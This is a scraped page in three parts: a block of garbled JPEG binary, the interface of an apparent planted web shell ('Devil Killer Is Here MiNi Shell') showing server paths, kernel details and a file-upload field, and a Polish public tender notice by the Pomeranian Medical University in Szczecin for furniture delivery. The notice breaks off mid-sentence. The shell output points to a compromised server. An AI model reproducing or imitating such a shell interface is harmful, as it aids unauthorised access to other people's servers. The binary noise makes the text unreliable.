JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230428/0019792401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż wyposażenia meblowego jednostek organizacyjnych Pomorskiego Uniwersytetu Medycznego w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pomorski Uniwersytet Medyczny w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288886</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rybacka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(91) 81 32 611</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż wyposażenia meblowego jednostek organizacyjnych Pomorskiego Uniwersytetu Medycznego w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b18d4426-e59b-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00197924</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie, w części 2, jest realizowane w ramach projektu „Poprawa dostępności Pomorskiego Uniwersytetu Medycznego w Szczecinie dla osób niepełnosprawnych”, umowa nr POWR.03.05.00-00-A066/20-00”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pum_edu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Zasady komunikacji elektronicznej zostały, z uwagi na ograniczoną ilość znaków w niniejszym ogłoszeniu o zamówieniu szczegółowo opisane w specyfikacji warunków zamówienia;<br/>2) ofertę wraz z załącznikami należy złożyć wyłącznie za pośrednictwem „Formularza”, dostępnego na Platformie Zakupowej, w miejscu publikacji ogłoszenia o zamówieniu i innych dokumentów zamówienia; oferta wraz z załącznikami złożona za pośrednictwem formularza wiadomości, albo na adres poczty elektronicznej zostanie odrzucona jako niezgodna z ustawą pzp;<br/>3) korespondencja przekazana Zamawiającemu np. w formie papierowej, listownie, na pendrive lub innym nośniku danych, nie będzie brana pod uwagę;<br/>4) adres strony internetowej: https://platformazakupowa.pl/pn/pum_edu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) ofertę i oświadczenia, o którym mowa w art. 125 ust. 1 ustawy pzp, a także inne dokumenty składane wraz z ofertą przygotowuje się i składa się, pod rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego) lub w postaci elektronicznej,<br/>opatrzonej podpisem zaufanym lub podpisanej przy pomocy dowodu osobistego z warstwą elektroniczną (tzw. podpisem osobistym);<br/>2) w celu złożenia oferty Wykonawca może, ale nie musi założyć konto na Platformie Zakupowej. Instrukcja dotycząca rejestracji i logowania dostępna jest pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie Zakupowej, ani logowania.<br/>4) korzystanie z platformy zakupowej przez Wykonawców jest bezpłatne.<br/>5) za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę zapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Pomorski Uniwersytet Medyczny w Szczecinie, ul. Rybacka 1, 70-204 Szczecin.<br/>2. We wszelkich sprawach związanych z przetwarzaniem przez nas Twoich danych osobowych możesz skontaktować się z Inspektorem Ochrony Danych pod adresem email iod@pum.edu.pl lub pod numerem telefonu 914800790.<br/>3. Celem przetwarzania danych osobowych jest przeprowadzenie postępowania o udzielenie zamówienia publicznego w Pomorskim<br/>Uniwersytecie Medycznym w Szczecinie.<br/>4. Udostępnienie danych osobowe, o których mowa w art. 10 RODO, następuje w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX, ustawy Prawo zamówień publicznych z dnia 11 września 2019 r.<br/>5. Dane osobowe mogą być udostępnione następującym kategoriom odbiorców:<br/>1) podmiotom, którym muszą zostać udostępnione na podstawie przepisów prawa, w tym właściwym organom do załatwienia konkretnej sprawy albo na podstawie art. 18 ust. 6 lub 74 ust. 1 ustawy Prawo zamówień publicznych z dnia 11 września 2019 r.,<br/>2) podmiotom, z którymi współpracujemy w celu osiągnięcia powyższych celów przetwarzania w związku z przeprowadzeniem postępowania o udzielenie zamówienia publicznego, w tym instytucjom finansowym oraz bankom, firmom świadczącym usługi informatyczne oraz pocztowo-kurierskie,<br/>3) osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 6 lub 74 ust. 1 ustawy Prawo zamówień publicznych z dnia 11 września 2019 r.<br/>6. Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Prawo zamówień publicznych z dnia 11 września 2019 r. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, dane są przechowywane przez cały okres obowiązywania umowy w sprawie<br/>zamówienia publicznego. W okresie późniejszy, w zakresie w jakim wymagane jest to przez inne przepisy ustawowe.<br/>7. Biorąc pod uwagę poniższe zastrzeżenia wynikające z art. 78 ustawy pzp, w związku z przetwarzaniem przez nas Pani/Pana danych osobowych może Pani/Pan skorzystać z prawa dostępu do swoich danych, sprostowania (poprawiania) danych, usunięcia danych oraz ograniczenia przetwarzania.<br/>PUM może żądać wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia (art. 75)<br/>- Skorzystanie z uprawnienia do sprostowania lub uzupełnienia nie może jednak naruszać integralności protokołu oraz jego załączników (art. 76)<br/>postępowania o udzielenie zamówienia publicznego lub konkursu (art. 19 ust. 3). Przysługuje Tobie także prawo wniesienia skargi do organu nadzorującego przestrzeganie przepisów ochrony danych osobowych tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>Aby mieć pewność, że jesteś uprawniony do skorzystania z praw możemy prosić Ciebie o podanie dodatkowych informacji pozwalających na dokonanie identyfikacji.<br/>8. Obowiązek podania danych osobowych w zakresie danych oferenta jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych z dnia 11 września 2019 r. związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych z dnia 11 września 2019 r.<br/>9. Nie będziemy przekazywać Twoich danych poza EOG. Nie podejmujemy decyzji w sposób zautomatyzowany, czyli na podstawie automatycznej analizy danych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), zwanego dalej &#34;RODO&#34;, w celu umożliwienia korzystania za środków ochrony prawnej, o których mowa w ustawie, do upływu terminu na ich wniesienie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-240/13/TP2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wyposażenia meblowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39130000-2 - Meble biurowe</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <p class="mb-0">39112000-0 - Krzesła</p> <p class="mb-0">39110000-6 - Siedziska, krzesła i produkty z nimi związane, i ich części</p> <p class="mb-0">39120000-9 - Stoły, kredensy, biurka i biblioteczki</p> <p class="mb-0">39141000-2 - Meble i wyposażenie kuchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający będzie uprawniony, lecz nie jest zobowiązany, do skorzystania z prawa opcji, w czasie obowiązywania umowy, zawartej w wyniku niniejszego postępowania.<br/>2.	Warunki skorzystania z prawa opcji: <br/>1)	prawem opcji objęta jest dostawa mebli, określonych w Formularzu cenowym i w liczbie określonej w Formularz cenowym; <br/>2)	Zamawiający zamówi podstawowy zakres zamówienia, określony w Formularzu cenowym;<br/>3)	przedmiot zamówienia objęty prawem opcji, określony w Formularzu cenowym, zostanie zakupiony w zależności od potrzeb Zamawiającego, zgodnie z następującymi zasadami:<br/>a)	warunkiem uruchomienia prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie. Zamawiający złoży Oświadczenie, w formie elektronicznej, na adres mailowy, wskazany przez Wykonawcę, w umowie, <br/>b)	Wykonawca będzie zobowiązany wykonać zamówienie, objęte prawem opcji, po uprzednim otrzymaniu oświadczenia woli od Zamawiającego, o skorzystaniu z prawa opcji i jego zakresie,<br/>c)	termin wykonania zamówienia, objętego prawem opcji, jest tożsamy z terminem wykonania zamówienia podstawowego, zadeklarowanego w kryterium oceny ofert, od dnia przesłania ww. Oświadczenia (zamówienia) do Wykonawcy,<br/>d)	prawo opcji realizowane będzie w terminie obowiązywania umowy, po wyczerpaniu przedmiotu zamówienia podstawowego, na takich samych warunkach jak zamówienie podstawowe, <br/>e)	ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy, co Wykonawca akceptuje zawierając umowę, z zastrzeżeniem waloryzacji wynagrodzenia, opisanego w umowie,<br/>f)	wynagrodzenie za przedmiot umowy, w ramach prawa opcji, będzie stanowić iloczyn ceny jednostkowej brutto oraz liczby zamówionych mebli, wskazanych w treści oświadczenia woli, o którym mowa w lit. a),<br/>g)	Zamawiający może z prawa opcji korzystać wielokrotnie, do wyczerpania maksymalnej liczby mebli, określonej w Formularzu cenowym, w całym okresie, na który zawarta jest niniejsza umowa o zamówienie publiczne,<br/>h)	skorzystanie z prawa opcji nie wymaga aneksowania umowy,<br/>i)	w przypadku skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, poza zapłatą wynagrodzenia za prawidłowo wykonane dostawy wskazane w oświadczeniu Zamawiającego, <br/>j)	w przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania z prawa opcji w niepełnym zakresie, Wykonawcy nie przysługuje względem zamawiającego żadne roszczenie z tego tytułu, <br/>k)	skorzystanie przez Zamawiającego z prawa opcji będzie uzależnione od aktualnego zapotrzebowania Zamawiającego oraz jego możliwości finansowych. <br/>4)	Skorzystanie z prawa opcji nie stanowi zmiany umowy, nie powoduje konieczności zawarcia dodatkowej umowy ani aneksu do umowy. <br/>5)	Zasady rozliczeń przedmiotu zamówienia objętego prawem opcji będą takie same jak zasady rozliczeń podstawowego przedmiotu zamówienia.<br/>6)	Z prawa opcji Zamawiający skorzysta na podstawie zapisów tej samej umowy zawartej w wyniku postępowania o udzielenie zamówienia, bez konieczności zawierania nowej umowy.<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia, w maksymalnym terminie:<br/>Część 1 - od 3 do 6 tygodni od daty złożenia zamówienia (od 21 do 42 dni kalendarzowych).<br/>Jednocześnie, w zakresie zamówienia z prawem opcji, okres obowiązywania umowy: Część 1 okres trwania umowy 12 miesięcy, od dnia zawarcia. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta która uzyska najwięcej punktów obliczonych w oparciu o ustalone kryteria według wzoru C+T+K, i przyjętą metodę oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od zamówienia złożonego przez Zamawiającego „T” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłokę w dostawie, od zamówienia złożonego przez Zamawiającego „K” (w cz. 1, 2, 3 - w zamówieniu podstawowym i w ramach prawa opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wyposażenia meblowego w ramach projektu pn. „Poprawa dostępności Pomorskiego Uniwersytetu Medycznego w Szczecinie dla osób niepełnosprawnych” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39111100-4 - Siedziska obrotowe</p> <p class="mb-0">39121100-7 - Biurka</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający będzie uprawniony, lecz nie jest zobowiązany, do skorzystania z prawa opcji, w czasie obowiązywania umowy, zawartej w wyniku niniejszego postępowania.<br/>2.	Warunki skorzystania z prawa opcji: <br/>1)	prawem opcji objęta jest dostawa mebli, określonych w Formularzu cenowym i w liczbie określonej w Formularz cenowym; <br/>2)	Zamawiający zamówi podstawowy zakres zamówienia, określony w Formularzu cenowym;<br/>3)	przedmiot zamówienia objęty prawem opcji, określony w Formularzu cenowym, zostanie zakupiony w zależności od potrzeb Zamawiającego, zgodnie z następującymi zasadami:<br/>a)	warunkiem uruchomienia prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie. Zamawiający złoży Oświadczenie, w formie elektronicznej, na adres mailowy, wskazany przez Wykonawcę, w umowie, <br/>b)	Wykonawca będzie zobowiązany wykonać zamówienie, objęte prawem opcji, po uprzednim otrzymaniu oświadczenia woli od Zamawiającego, o skorzystaniu z prawa opcji i jego zakresie,<br/>c)	termin wykonania zamówienia, objętego prawem opcji, jest tożsamy z terminem wykonania zamówienia podstawowego, zadeklarowanego w kryterium oceny ofert, od dnia przesłania ww. Oświadczenia (zamówienia) do Wykonawcy,<br/>d)	prawo opcji realizowane będzie w terminie obowiązywania umowy, po wyczerpaniu przedmiotu zamówienia podstawowego, na takich samych warunkach jak zamówienie podstawowe, <br/>e)	ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy, co Wykonawca akceptuje zawierając umowę, z zastrzeżeniem waloryzacji wynagrodzenia, opisanego w umowie,<br/>f)	wynagrodzenie za przedmiot umowy, w ramach prawa opcji, będzie stanowić iloczyn ceny jednostkowej brutto oraz liczby zamówionych mebli, wskazanych w treści oświadczenia woli, o którym mowa w lit. a),<br/>g)	Zamawiający może z prawa opcji korzystać wielokrotnie, do wyczerpania maksymalnej liczby mebli, określonej w Formularzu cenowym, w całym okresie, na który zawarta jest niniejsza umowa o zamówienie publiczne,<br/>h)	skorzystanie z prawa opcji nie wymaga aneksowania umowy,<br/>i)	w przypadku skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, poza zapłatą wynagrodzenia za prawidłowo wykonane dostawy wskazane w oświadczeniu Zamawiającego, <br/>j)	w przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystania z prawa opcji w niepełnym zakresie, Wykonawcy nie przysługuje względem zamawiającego żadne roszczenie z tego tytułu, <br/>k)	skorzystanie przez Zamawiającego z prawa opcji będzie uzależnione od aktualnego zapotrzebowania Zamawiającego oraz jego możliwości finansowych. <br/>4)	Skorzystanie z prawa opcji nie stanowi zmiany umowy, nie powoduje konieczności zawarcia dodatkowej umowy ani aneksu do umowy. <br/>5)	Zasady rozliczeń przedmiotu zamówienia objętego prawem opcji będą takie same jak zasady rozliczeń podstawowego przedmiotu zamówienia.<br/>6)	Z prawa opcji Zamawiający skorzysta na podstawie zapisów tej samej umowy zawartej w wyniku postępowania o udzielenie zamówienia, bez konieczności zawierania nowej umowy.<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia, w maksymalnym terminie:<br/>Część 2 - od 3 do 6 tygodni od daty złożenia zamówienia (od 21 do 42 dni kalendarzowych), <br/>Jednocześnie, w zakresie zamówienia z prawem opcji, okres obowiązywania umowy: Część 2 okres trwania umowy 3 miesięcy, od dnia zawarcia. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana 